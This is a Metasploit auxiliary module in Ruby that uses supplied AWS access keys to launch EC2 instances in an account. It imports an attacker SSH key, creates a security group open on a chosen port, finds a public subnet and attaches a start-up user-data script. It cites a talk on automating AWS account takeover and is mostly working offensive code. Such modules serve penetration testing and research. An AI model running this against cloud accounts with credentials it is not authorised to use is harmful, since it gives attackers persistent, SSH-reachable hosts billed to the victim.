## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasploit/framework/aws/client' class MetasploitModule < Msf::Auxiliary include Metasploit::Framework::Aws::Client def initialize(info = {}) super( update_info( info, 'Name' => "Launches Hosts in AWS", 'Description' => %q{ This module will attempt to launch an AWS instances (hosts) in EC2. }, 'License' => MSF_LICENSE, 'Author' => [ 'Javier Godinez ', ], 'References' => [ [ 'URL', 'https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ'], [ 'URL', 'https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf' ] ] ) ) register_options( [ OptString.new('AccessKeyId', [true, 'AWS access key', '']), OptString.new('SecretAccessKey', [true, 'AWS secret key', '']), OptString.new('Token', [false, 'AWS session token', '']), OptString.new('RHOST', [true, 'AWS region specific EC2 endpoint', 'ec2.us-west-2.amazonaws.com']), OptString.new('Region', [true, 'The default region', 'us-west-2' ]), OptString.new("AMI_ID", [true, 'The Amazon Machine Image (AMI) ID', 'ami-1e299d7e']), OptString.new("KEY_NAME", [true, 'The SSH key to be used for ec2-user', 'admin']), OptString.new("SSH_PUB_KEY", [false, 'The public SSH key to be used for ec2-user, e.g., "ssh-rsa ABCDE..."', '']), OptString.new("USERDATA_FILE", [false, 'The script that will be executed on start', 'tools/modules/aws-aggregator-userdata.sh']) ] ) register_advanced_options( [ OptString.new('RPORT', [true, 'AWS EC2 Endpoint TCP Port', 443]), OptBool.new('SSL', [true, 'AWS EC2 Endpoint SSL', true]), OptString.new('INSTANCE_TYPE', [true, 'The instance type', 'm3.medium']), OptString.new('ROLE_NAME', [false, 'The instance profile/role name', '']), OptString.new('VPC_ID', [false, 'The EC2 VPC ID', '']), OptString.new('SUBNET_ID', [false, 'The public subnet to use', '']), OptString.new('SEC_GROUP_ID', [false, 'The EC2 security group to use', '']), OptString.new('SEC_GROUP_CIDR', [true, 'EC2 security group network access CIDR', '']), OptString.new('SEC_GROUP_PORT', [true, 'EC2 security group network access PORT', 'tcp:22']), OptString.new('SEC_GROUP_NAME', [false, 'Optional EC2 security group name', '']), OptInt.new('MaxCount', [true, 'Maximum number of instances to launch', 1]), OptInt.new('MinCount', [true, 'Minumum number of instances to launch', 1]) ] ) deregister_options('VHOST') end def run if datastore['AccessKeyId'].blank? || datastore['SecretAccessKey'].blank? print_error("Both AccessKeyId and SecretAccessKey are required") return end # setup creds for making IAM API calls creds = { 'AccessKeyId' => datastore['AccessKeyId'], 'SecretAccessKey' => datastore['SecretAccessKey'] } creds['Token'] = datastore['Token'] unless datastore['Token'].blank? create_keypair(creds) unless datastore['SSH_PUB_KEY'].blank? vpc = datastore['VPC_ID'].blank? ? vpc(creds) : datastore['VPC_ID'] sg = datastore['SEC_GROUP_ID'].blank? ? create_sg(creds, vpc) : datastore['SEC_GROUP_ID'] subnet = datastore['SUBNET_ID'].blank? ? pub_subnet(creds, vpc) : datastore['SUBNET_ID'] unless subnet print_error("Could not find a public subnet, please provide one") return end instance_id = launch_instance(creds, subnet, sg) action = 'DescribeInstances' doc = call_ec2(creds, 'Action' => action, 'InstanceId.1' => instance_id) doc = print_results(doc, action) begin # need a better parser so we can avoid shit like this ip = doc['reservationSet']['item']['instancesSet']['item']['networkInterfaceSet']['item']['privateIpAddressesSet']['item']['association']['publicIp'] print_status("Instance #{instance_id} has IP adrress #{ip}") rescue NoMethodError print_error("Could not retrieve instance IP address") end end def opts(action, subnet, sg) opts = { 'Action' => action, 'ImageId' => datastore['AMI_ID'], 'KeyName' => datastore['KEY_NAME'], 'InstanceType' => datastore['INSTANCE_TYPE'], 'NetworkInterface.1.SubnetId' => subnet, 'NetworkInterface.1.SecurityGroupId.1' => sg, 'MinCount' => datastore['MinCount'].to_s, 'MaxCount' => datastore['MaxCount'].to_s, 'NetworkInterface.1.AssociatePublicIpAddress' => 'true', 'NetworkInterface.1.DeviceIndex' => '0' } opts['IamInstanceProfile.Name'] = datastore['ROLE_NAME'] unless datastore['ROLE_NAME'].blank? unless datastore['USERDATA_FILE'].blank? if File.exist?(datastore['USERDATA_FILE']) opts['UserData'] = URI.encode(Base64.encode64(open(datastore['USERDATA_FILE'], 'r').read).strip) else print_error("Could not open userdata file: #{datastore['USERDATA_FILE']}") end end opts end def launch_instance(creds, subnet, sg) action = 'RunInstances' print_status("Launching instance(s) in #{datastore['Region']}, AMI: #{datastore['AMI_ID']}, key pair name: #{datastore['KEY_NAME']}, security group: #{sg}, subnet ID: #{subnet}") doc = call_ec2(creds, opts(action, subnet, sg)) doc = print_results(doc, action) return if doc.nil? # TODO: account for multiple instances if doc['instancesSet']['item'].instance_of?(Array) instance_id = doc['instancesSet']['item'].first['instanceId'] else instance_id = doc['instancesSet']['item']['instanceId'] end print_status("Launched instance #{instance_id} in #{datastore['Region']} account #{doc['ownerId']}") action = 'DescribeInstanceStatus' loop do sleep(15) doc = call_ec2(creds, 'Action' => action, 'InstanceId' => instance_id) doc = print_results(doc, action) if doc ['instanceStatusSet'].nil? print_error("Error, could not get instance status, instance possibly terminated") break end status = doc['instanceStatusSet']['item']['systemStatus']['status'] print_status("instance #{instance_id} status: #{status}") break if status == 'ok' || status != 'initializing' end instance_id end def create_keypair(creds) action = 'ImportKeyPair' doc = call_ec2(creds, 'Action' => action, 'KeyName' => datastore['KEY_NAME'], 'PublicKeyMaterial' => Rex::Text.encode_base64(datastore['SSH_PUB_KEY'])) if doc['Response'].nil? doc = print_results(doc, action) if doc['keyName'].nil? || doc['keyFingerprint'].nil? print_error("Error creating key using privided key material (SSH_PUB_KEY)") else print_status("Created #{doc['keyName']} (#{doc['keyFingerprint']})") end else if doc['Response']['Errors'] && doc['Response']['Errors']['Error'] print_error(doc['Response']['Errors']['Error']['Message']) else print_error("Error creating key using privided key material (SSH_PUB_KEY)") end end end def pub_subnet(creds, vpc_id) # First look for subnets that are configured to provision a public IP when instances are launched action = 'DescribeSubnets' doc = call_ec2(creds, 'Action' => action) doc = print_results(doc, action) vpc_subnets = doc['subnetSet']['item'].select { |x| x['vpcId'] == vpc_id } pub_subnets = vpc_subnets.select { |x| x['mapPublicIpOnLaunch'] == 'true' } return pub_subnets.first['subnetId'] if pub_subnets.count > 0 # Second, try to retrieve public subnet id by looking through route tables to find subnets # associated with an Internet gateway action = 'DescribeRouteTables' doc = call_ec2(creds, 'Action' => action) doc = print_results(doc, action) vpc_route_table = doc['routeTableSet']['item'].select { |x| x['vpcId'] == vpc_id } vpc_route_table.each do |route_table| next if route_table['associationSet'].nil? || route_table['routeSet'].nil? entries = route_table['routeSet']['item'] if entries.instance_of?(Hash) if entries['gatewayId'].start_with?('igw-') return route_table['associationSet']['item'].first['subnetId'] end else route_table['routeSet']['item'].each do |route| if route['gatewayId'] && route['gatewayId'].start_with?('igw-') return route_table['associationSet']['item'].first['subnetId'] end end end end nil end def create_sg(creds, vpc_id) name = Rex::Text.rand_text_alphanumeric(8) action = 'CreateSecurityGroup' doc = call_ec2(creds, 'Action' => action, 'GroupName' => name, 'VpcId' => vpc_id, 'GroupDescription' => name) doc = print_results(doc, action) print_error("Could not create SG") && return if doc['groupId'].nil? sg = doc['groupId'] proto, port = datastore['SEC_GROUP_PORT'].split(':') cidr = URI.encode(datastore['SEC_GROUP_CIDR']) action = 'AuthorizeSecurityGroupIngress' doc = call_ec2(creds, 'Action' => action, 'IpPermissions.1.IpRanges.1.CidrIp' => cidr, 'IpPermissions.1.IpProtocol' => proto, 'IpPermissions.1.FromPort' => port, 'IpPermissions.1.ToPort' => port, 'GroupId' => sg) doc = print_results(doc, action) if doc['return'] && doc['return'] == 'true' print_status("Created security group: #{sg}") else print_error("Failed creating security group") end sg end def vpc(creds) action = 'DescribeVpcs' doc = call_ec2(creds, 'Action' => action) doc = print_results(doc, action) if doc['vpcSet'].nil? || doc['vpcSet']['item'].nil? print_error("Could not determine VPC ID for #{datastore['AccessKeyId']} in #{datastore['RHOST']}") return nil end item = doc['vpcSet']['item'] return item['vpcId'] if item.instance_of?(Hash) return item.first['vpcId'] if item.instance_of?(Array) && !item.first['vpcId'].nil? print_error("Could not determine VPC ID for #{datastore['AccessKeyId']} in #{datastore['RHOST']}") nil end end